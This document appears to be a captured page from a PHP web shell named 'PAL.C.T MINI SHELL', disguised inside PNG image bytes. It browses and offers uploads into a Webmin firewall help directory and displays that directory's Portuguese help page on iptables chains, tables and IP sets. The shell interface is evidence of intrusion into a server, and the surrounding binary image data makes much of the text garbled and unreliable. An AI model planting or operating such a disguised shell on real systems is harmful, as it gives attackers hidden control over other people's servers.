php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /usr/libexec/webmin/firewall/help/
upload
files >> //usr/libexec/webmin/firewall/help/intro.pt.auto.html

<header> Firewall do Linux </header><h3> Introdução ao módulo </h3> Este módulo permite configurar os recursos de firewall das tabelas de IP encontrados na série 2.4 dos kernels do Linux. Ao contrário de outros programas de configuração de firewall, em vez de criar um script de shell que configura o firewall, ele lê e edita um arquivo salvo no formato lido e gravado por <tt>ipi (6) tables-restore</tt> e <tt>ipi (6) tables-save,</tt> respectivamente. <p> Se você já possui um firewall em seu sistema que foi configurado manualmente ou a partir de um arquivo de script, o módulo oferecerá a conversão para um arquivo de salvamento de tabelas IP para você e criará um script para ser executado no momento da inicialização para ativar as regras em o arquivo. No entanto, se você fizer isso, não deverá mais editar o script de regras do firewall e também deve desativar a execução no momento da inicialização. <p><h3> Visão geral das tabelas de IP </h3> Todo pacote de rede que entra, sai ou é encaminhado pelo sistema é verificado em uma ou mais cadeias para determinar o que acontecerá com ele. Cada cadeia contém zero ou mais regras, cada uma com uma condição (para determinar quais pacotes corresponde) e uma ação (para controlar o que acontece com esses pacotes correspondentes). Cada cadeia também possui uma ação padrão que controla o que acontece com pacotes que não correspondem a nenhuma regra. <p> Cada cadeia faz parte de uma tabela, da qual existem atualmente três: <ul><li> <b>Filtragem de pacotes ( <tt>filtro</tt> )</b> <br> As cadeias nesta tabela podem ser usadas para controlar os dados que chegam ao seu sistema a partir de outros hosts da rede, os dados enviados pelo usuário pelos usuários e processos e os dados encaminhados pelo sistema se estiver atuando como roteador. <p><li> <b>Tradução de endereços de rede ( <tt>nat</tt> )</b> <br> Essa tabela pode ser usada para configurar o NAT ou o mascaramento, o que é útil se você deseja conceder acesso a uma rede inteira de máquinas à Internet através de apenas um endereço IP real. <p><li> <b>Alteração de pacote ( <tt>mangle</tt> )</b> <br> Esta tabela é para modificar pacotes encaminhados ou enviados pelo seu sistema. <p></ul> Além das cadeias padrão que fazem parte de cada tabela, você também pode criar suas próprias cadeias que podem ser executadas por regras nas cadeias integradas. Isso pode ser útil para agrupar e compartilhar regras que podem ser usadas em vários locais. <p><h3> A página principal </h3> A página principal deste módulo lista todas as cadeias e regras de uma das tabelas disponíveis, selecionadas na lista no canto superior esquerdo. Abaixo está uma seção para cada cadeia na tabela atual, com todas as regras em cada cadeia listadas e suas condições descritas da melhor maneira possível. Para cada cadeia, você pode alterar a ação padrão usando a lista suspensa se a cadeia for uma das incorporadas à tabela ou excluí-la com o botão Excluir cadeia se for definido pelo usuário. <p> Você pode clicar em qualquer regra de uma cadeia para editá-la, clicar nas setas à direita de cada linha para movê-la para cima ou para baixo ou clicar no botão Adicionar regra para adicionar uma nova. Adicionar ou editar uma regra o levará a uma página na qual você pode selecionar a ação para cada regra e as condições para as quais a ação é executada. <p> Na parte inferior da página, há um botão para ativar a configuração atual do firewall, carregando-a no kernel com o <tt>comando ipi (6) tables-restore</tt> . Abaixo, há um botão para fazer o inverso - pegando a configuração que está atualmente no kernel e disponibilizando-a para edição. Finalmente, se sua distribuição suportar, existe um botão para alterar se o firewall está ativado no momento da inicialização ou não. <p><h3> Cadeias de filtragem </h3> Para uma melhor colaboração com scripts externos do iptables, você pode excluir cadeias individuais do processamento pelo firewall. Para fazer isso, você deve selecionar o processamento direto de regras nas configurações e inserir uma lista de filtros, que exclui as cadeias apropriadas do processamento. As cadeias que não são excluídas da edição são sinalizadas com uma mensagem &quot;não gerenciado pelo firewall&quot;. <p><h3> Conjuntos de IP </h3> As versões mais recentes da tabela ip (6) suportam a extensão ipset. Conjuntos de IPs são listas de endereços IP na memória principal, que podem ser pesquisadas com muita eficiência e usadas como uma condição nas regras. Na página principal, os conjuntos de IP existentes que podem ser usados por regras são exibidos. Atualmente, no entanto, não é possível gerenciá-los no firewall. <p><hr>
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`